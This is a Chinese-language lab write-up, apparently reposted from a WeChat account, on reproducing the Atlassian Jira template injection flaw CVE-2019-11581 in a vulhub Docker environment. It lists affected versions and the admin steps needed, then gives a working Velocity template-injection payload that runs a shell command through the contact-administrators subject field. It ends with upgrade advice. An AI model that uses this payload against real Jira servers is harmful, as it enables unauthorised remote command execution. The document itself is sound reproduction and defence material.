漏洞描述
Atlassian Jira是企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。多个版本前存在利用模板注入执行任意命令:
影响范围
4.4.x
5.x.x
6.x.x
7.0.x
7.1.x
7.2.x
7.3.x
7.4.x
7.5.x
7.6.x before 7.6.14 (the fixed version for 7.6.x)
7.7.x
7.8.x
7.9.x
7.10.x
7.11.x
7.12.x
7.13.x before 7.13.5 (the fixed version for 7.13.x)
8.0.x before 8.0.3 (the fixed version for 8.0.x)
8.1.x before 8.1.2 (the fixed version for 8.1.x)
8.2.x before 8.2.3 (the fixed version for 8.2.x)
环境搭建
这里使用docker进行安装
进入目录
cd vulhub/jira/CVE-2019-11581/
启动环境
docker-compose up -d
访问
http://your-ip:8080
选择将其设置为我
去Atlassian官方申请一个Jira Server的测试证书
漏洞复现
登录成功后访问,添加
http://192.168.204.131:8080/secure/admin/AddSmtpMailServer!default.jspa
访问,进行系统设置
http://192.168.204.131:8080/secure/admin/EditApplicationProperties!default.jspa
开启联系管理员表单
然后随便创建一个项目
创建成功后,访问
http://192.168.204.131:8080/secure/ContactAdministrators!default.jspa
漏洞爆发点在主题字段,把主题换上我们的payload,点击发送
Poc
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('touch /tmp/cve-2020-11581').toString()
修复建议
升级到安全版本
本文始发于微信公众号(锋刃科技):Atlassian Jira 模板注入漏洞(CVE-2019-11581)复现
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论